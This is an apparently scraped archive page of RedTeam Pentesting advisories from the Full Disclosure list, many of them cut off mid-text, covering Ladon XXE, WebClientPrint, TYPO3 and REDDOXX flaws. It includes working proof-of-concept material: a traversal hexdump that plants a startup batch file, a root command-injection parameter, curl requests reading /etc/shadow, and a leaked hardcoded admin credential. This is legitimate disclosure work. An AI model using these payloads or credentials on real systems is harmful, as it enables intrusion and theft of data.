2017-11-06 Vulnerability identified
2017-11-13 Customer approved further research
2017-12-01 Further research conducted
2018-01-09 Customer approved disclosure to vendor
2018-01-10 Vendor notified
2018-01-12 Vendor released fixed version
2018-01-15 Advisory released


[1] https://www.shibboleth.net/
[2] https://www.w3.org/TR/xmldsig-core/
[3] https://github.com/UniconLabs/dockerized-idp-testbed
[4] https://shibboleth.net/downloads/service-provider/2.6.1/
[5] https://shibboleth.net/community/advisories/secadv_20180112.txt
[6] https://security-tracker.debian.org/tracker/CVE-2018-0486

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-008] XML External Entity Expansion in Ladon Webservice

2017-11-03 Thread RedTeam Pentesting GmbH

' \
'http://localhost:/HelloService/soap11' | xmllint --format -

The server answers with a response containing the passwd-file:


  Hello root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:[...]



The Python package defusedxml [2] can be used to monkey patch the code to
prevent XML vulnerabilities.  The following workaround can be included in the
code, which prevents exploitation:

import defusedxml


Currently no fix is available.

Security Risk

Attackers are able to read local files on the server of the webservice
with the privileges of the webservice. Furthermore, attackers are able
to create HTTP request from the webservice to other services on the
Internet or the local network. It is likely that attackers are able to
gain access to credentials for database services used by the webservice.
Attackers may also be able to cause a denial-of-service attack against
the respective webservice. Depending on the data stored on the
vulnerable system and the relevance of the webservice, this
vulnerability may pose a high risk.


2016-11-29 Vulnerability identified
2016-11-29 Customer notified vendor
2017-07-10 Customer fixed problem in their own product
2017-07-21 RedTeam Pentesting notified vendor
2017-08-11 RedTeam Pentesting asked vendor for status update
2017-09-08 RedTeam Pentesting asked vendor for status update and announced
   public release for end of October
2017-10-09 RedTeam Pentesting asked vendor for status update
2017-11-03 Advisory released (no reply from vendor to status update requests)


[1] http://ladonize.org
[2] https://pypi.python.org/pypi/defusedxml

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-011] WebClientPrint Processor 2.0: No Validation of TLS Certificates

2017-08-22 Thread RedTeam Pentesting GmbH


Affected users should disable the WCPP handler and upgrade to a fixed
version as soon as possible.


Install a WCPP version greater or equal to[0].

Security Risk

WCPP does not verify TLS certificates when establishing HTTPS
connections. Man-in-the-middle attackers can therefore intercept those
connections with little effort. This may lead to a disclosure of
confidential information if sensitive documents are printed via WCPP.
Furthermore, the integrity of the printed documents cannot be guaranteed
as attackers are able to modify the documents in transit.

The described attack requires a man-in-the-middle position which is a
rather strong prerequisite. It is therefore estimated that the
vulnerability poses a medium risk.


2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
   clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released


[1] http://www.dest-unreach.org/socat/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-010] WebClientPrint Processor 2.0: Unauthorised Proxy Modification

2017-08-22 Thread RedTeam Pentesting GmbH
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released



RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-009] WebClientPrint Processor 2.0: Remote Code Execution via Updates

2017-08-22 Thread RedTeam Pentesting GmbH
migrating the malicious code to another place. This way, WCPP
functionality would not be disrupted and the attacked users may be
tricked to believe that a legitimate update has just occurred.

Because of the rarely fulfilled prerequisite of a browser running with
elevated or administrative privileges, this vulnerability is estimated
to pose a low risk.


2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
   clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released



RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-008] WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs

2017-08-22 Thread RedTeam Pentesting GmbH
MP% directory. Typically, this directory is located at:


Proof of Concept

During RedTeam Pentesting's analysis of WCPP it was found that malicious
CPJ files can be crafted that exploit a directory traversal bug in WCPP.
Such an example is given in the following hexdump, showing the file

$ xxd rce-user.txt
: 6370 6a02 0201  0301  7763 7050  cpj.wcpP
0010: 463a 2e2e 5c2e 2e5c 526f 616d 696e 675c  F:..\..\Roaming\
0020: 4d69 6372 6f73 6f66 745c 5769 6e64 6f77  Microsoft\Window
0030: 735c 5374 6172 7420 4d65 6e75 5c50 726f  s\Start Menu\Pro
0040: 6772 616d 735c 5374 6172 7475 705c 5265  grams\Startup\Re
0050: 6454 6561 6d2e 6261 747c 4065 6368 6f20  dTeam.bat|@echo
0060: 6f66 660d 0a63 6c73 0d0a 6563 686f 2e0d  off..cls..echo..
0070: 0a65 6368 6f20 5072 6f6f 662d 6f66 2d43  .echo Proof-of-C
0080: 6f6e 6365 7074 0d0a 6563 686f 202d 2d2d  oncept..echo ---
0090: 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d0d 0a65  -..e
00a0: 6368 6f20 5265 6d6f 7465 2043 6f64 6520  cho Remote Code
00b0: 4578 6563 7574 696f 6e20 7669 6120 5765  Execution via We
00c0: 6243 6c69 656e 7450 7269 6e74 2076 322e  bClientPrint v2.
00d0: 302e 3135 2e31 3039 0d0a 464f 5220 2f4c  0.15.109..FOR /L
00e0: 2025 2578 2049 4e20 2831 2c31 2c31 3829   %%x IN (1,1,18)
00f0: 2044 4f20 6563 686f 2e0d 0a73 7461 7274   DO echo...start
0100: 2063 616c 630d 0a70 6175 7365 0d0a 007c   calc..pause...|

In this example the filename is set to

..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat

which is appended to the %TEMP% directory as follows:

Start Menu\Programs\Startup\RedTeam.bat

After resolving the "..\..\" sequence contained in the filename, this
yields the following path:

C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\

As a consequence, the file content beginning at 0x5a is written to the
file RedTeam.bat in the current user's Startup folder. Therefore,
RedTeam.bat will be executed once the affected user logs in again. As a
proof of concept, a text will be displayed and Windows' calculator is

On one hand, this exploit can be executed when the following URL is
entered into the URL bar of a browser:


On the other hand, visiting users of a malicious website may be attacked
without user interaction when the webclientprint URL is embedded into an
iframe as follows:




The proof of concept printed above contains no valid license key, so a
notification window is shown when the exploit is executed. However, this
does not prevent successful exploitation. Attackers can easily add a
valid license key (e.g. by buying a license), so the window is not shown
and there is no visual indication of exploitation anymore.

The proof of concept is designed to print using the default printer.
Since WCPP does not seem to know how to print batch files, it exits
silently with the result that a successful attack does not print the
batch file.


Affected users should disable the WCPP handler and upgrade to a fixed
version as soon as possible.


Install a WCPP version greater or equal to[1].

Security Risk

If a user of WCPP visits an attacker-controlled website, arbitrary code
can be executed on the attacked user's computer. If a valid license key
is provided, there is no visual indication of the ongoing attack.
Furthermore, no user interaction is required to trigger the
vulnerability once a malicious website is visited. It is therefore
estimated that this vulnerability poses a high risk.


2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
   clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released


[0] http://webclientprint.azurewebsites.net/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of speci

[FD] [RT-SA-2016-007] Cross-Site Scripting in TYPO3 Formhandler Extension

2017-07-27 Thread RedTeam Pentesting GmbH
 twice for this attack to work and therefore can only
target individual users. All in all this is considered to be a
medium-risk vulnerability. Depending on the affected site the risk needs
to be adjusted accordingly.


2016-09-22 Vulnerability identified
2016-10-07 Customer approved disclosure to vendor
2016-10-07 Vendor notified
2016-10-11 Preliminary advisory sent to vendor
2016-10-12 Vendor prepared patch and sent it to TYPO3 security team
2016-10-13 Customer needs time to test the patch and deploy it
2017-07-10 Customer finished testing and deployment of patch
2017-07-17 Vendor agreed to have patch published as PR on Github
2017-07-27 Vendor patch published as pull request for a possibly active fork
2017-07-27 Advisory released


[2] https://packetstormsecurity.com/files/137127/typo3-xssbypass.txt
[3] http://examples.typo3-formhandler.com/start/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-009] Remote Command Execution as root in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH

Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo
'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are
only used to distinguish the output of the "id" command in the final
result, which can be retrieved and displayed using the following curl

$ curl --silent -H 'Accept: application/json' \
http://www.example.com/api/v1/rws/diagnose/result/Ping | jq .Output | \
sed 's;.*REDTEAM_MARKER_START\\n\(.*\)\\nREDTEAM_MARKER_END.*;\1;' | \
sed 's/\\n/\n/g'
uid=0(root) gid=0(root) groups=0(root)




Update the appliance software to Version 2032 SP2.

Security Risk

The diagnostic functions offered by the REDDOXX appliance allow attackers
to execute arbitrary commands. Since the commands are executed with root
privileges and no authentication is required, this is rated as a high


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-008] Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance

RedTeam Pentesting discovered a vulnerability which allows attackers
unauthenticated access to the diagnostic functions of the administrative
interface of the REDDOXX appliance. The functions allow, for example, to
capture network traffic on the appliance's interfaces.


Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-008
Advisory Status: published
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)

More Details

The administrative interface of the REDDOXX appliance [0] offers several
diagnostic tools in the "Diagnostic Center". Tcpdump is one of these
tools. This tool can be used to capture network traffic on local

During a penetration test, it was discovered that this function, as well
as the other diagnostic functions, does not require authentication.

Proof of Concept

The following curl command-line can be used to start the capture

$ curl --include --silent -H 'Content-Type: application/json' \
--data-binary '{"Name":"Tcpdump","Parameter":{"host":"","port":""}}' \
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 14:58:22 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Content-Length: 0
Content-Type: application/xml

The following curl command-line stops the capture process:

$ curl --include --silent -H 'Content-Type: application/json' \
--data-binary '{"Name":"Tcpdump"}' \
HTTP/1.1 200 OK
Date: Thu, 18 May 2017 15:00:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Content-Length: 0
Content-Type: application/xml

After the capture process is complete, the resulting capture file can be
downloaded without authentication:

$ wget http://www.example.com/rws/resources/diagnosemanager/tcpdump.cap
Connecting to www.example.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1801530 (1.7M) [application/vnd.tcpdump.pcap]
Saving to: ‘tcpdump.cap’
tcpdump.cap 100%[===>]
1.72M [...]
2017-05-18 17:01:36 (34.1 MB/s) - ‘tcpdump.cap’ saved [1801530/1801530]

None of these requests contain any credentials or cookies, which could
provide authentication.




Update the appliance software to Version 2032 SP2.

Security Risk

The diagnostic functions of the REDDOXX appliance can be used without
authentication. This allows attackers to, for example, capture network
traffic. During a penetration test it was possible to capture multiple
emails and also POP3 login attempts with cleartext credentials. This is
rated as a high risk.


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


[0] https://www.reddoxx.com/en/

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in

[FD] [RT-SA-2017-007] Undocumented Administrative Service Account in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Undocumented Administrative Service Account in REDDOXX Appliance

RedTeam Pentesting discovered an undocumented service account in the
REDDOXX appliance software, which allows attackers to access the
administrative interface of the appliance and change its configuration.


Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Hidden Service Account
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-007
Advisory Status: published
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)

More Details

Through the ISO provided on the vendor's homepage [1], it was possible
to analyze the files in a typical REDDOXX appliance [0] installation. As
part of this process, hardcoded credentials for a service account were
found in a .NET binary file. With these credentials, it was possible to
authenticate against the administrative interface.

Proof of Concept

The following curl command-line shows an unsuccessful login attempt with
invalid credentials against the administrative interface:

$ curl --silent -H 'Content-Type: application/json' --data '{"UserName": 
"redteam@local", "Password":"redteam"}' 
http://www.example.com/api/v1/proxy/auth/credentials | jq .
  "ResponseStatus": {
"ErrorCode": "Unauthorized",
"Message": "Invalid UserName or Password",
"Errors": []

When the credentials extracted from the binaries are provided however,
the webserver returns a session ID instead of an error message,
indicating a successful login:

$ curl --silent -H 'Content-Type: application/json' --data '{"UserName": 
"rdx-build-in-service-user@local", "Password":"rdx!1ntern4l"}' 
http://www.example.com/api/v1/proxy/auth/credentials | jq .
  "SessionId": "Qm5odfSFB2tVh8De6HjD",
  "UserName": "rdx-build-in-service-user@local",
  "DisplayName": "",
  "ResponseStatus": {}




Update the appliance software to Version 2032 SP2.

Security Risk

The hidden service account allows attackers to authenticate to the
administrative interface of the appliance. With this level of access,
the appliance can be completely reconfigured. For example, core
functionalities, such as spam filtering or archiving, can be disabled.
RedTeam Pentesting assumes that the hidden service account is present
on all REDDOXX installations and rates its presence as a high risk.


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in

[FD] [RT-SA-2017-006] Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
'"method":"FileTransfer.GetDirectoryList","params":{"Directory": "/etc/"}}' \
'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName'

Since the process handling the requests runs with root privileges, it
was also possible to read the contents of the file "/etc/passwd":

$ curl --silent --data-binary '{"id":"{----}",'\
'"method":"FileTransfer.DownloadFile","params":{"FileName": "/etc/shadow",'\
'"Sequence": 1,"ChunkSize": 1}}' 'http://www.example.com/RdxEngine/json' \
| jq -r .result.ChunkData | tr -d '\r\n' | base64 -d




Update the appliance software to Version 2032 SP2.

Security Risk

Attackers with access to a REDDOXX appliance are able to retrieve
directory listings and content of arbitrary files. Although this
vulnerability requires attackers to submit a valid session ID, the
vulnerabilities described in rt-sa-2017-004 [2] and rt-sa-2017-005 [3]
show how this requirement can be fulfilled even by attackers without
valid credentials. Additionally, the RdxEngine process handling the
requests to the vulnerable methods runs with root privileges, allowing
attackers to read any file on the filesystem and, for example, extract
the local user hashes for offline brute-force attacks. This
vulnerability is therefore rated as a high risk.


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-005

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-005] Unauthenticated Extraction of Session-IDs in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
nType": "Console",
  "IPAddress": "",
  "Details": "rdx-build-in-service-user@local"
  "Id": "{----}",
  "SessionType": "WebService",
  "IPAddress": "",
  "Details": "rdx-build-in-service-user@local Last access: 22-5-17 10:26:17"
  "Id": "{----}",
  "SessionType": "WebService",
  "IPAddress": "",
  "Details": "Info@[...] Last access: 22-5-17 09:53:21"
  "Id": "{----}",
  "SessionType": "WebService",
  "IPAddress": "",
  "Details": "Administrator@[...] Last access: 22-5-17 10:09:30"
  "Id": "{----}",
  "SessionType": "WebService",
  "IPAddress": "",
  "Details": "rdx-build-in-service-user@local Last access: 22-5-17 10:11:19"
  "Id": "{----}",
  "SessionType": "WebService",
  "IPAddress": "",
  "Details": "rdx-build-in-service-user@local Last access: 22-5-17 13:13:19"

The tool jq [2] is used to format the JSON output returned by the
appliance's API.




Update the appliance software to Version 2032 SP2.

Security Risk

The risk of this vulnerability is estimated to be high. The extracted
session IDs can be used by attackers to impersonate the user associated
with the ID when interacting with the appliance. An authenticated
session is also a precondition to exploit the vulnerability described
in rt-sa-2017-006 [3], which allows arbitrary file disclosure as root.


2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] https://stedolan.github.io/jq/
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-006

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-004] Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System 
hacluster:x:107:113:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
firebird:x:108:114:Firebird Database Administator,,,:/var/lib/firebird:/bin/bash
redis:x:109:115:redis server,,,:/var/lib/redis:/bin/false




Update the appliance software to Version 2032 SP2.

Security Risk

This vulnerability can be used by attackers to download arbitrary files
if the filename and path is known from filesystems reachable on the
appliance. Depending on the configuration of the appliance, attackers
can read the credentials stored in the configuration files or extract
session IDs from log files. There are also no authentication checks in
place. Therefore, the vulnerability poses a high risk.


2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-003

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen

Description: PGP signature

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-003] Cross-Site Scripting in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
 a system under the attacker's control.
The vulnerability is therefore rated as a high risk.


2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

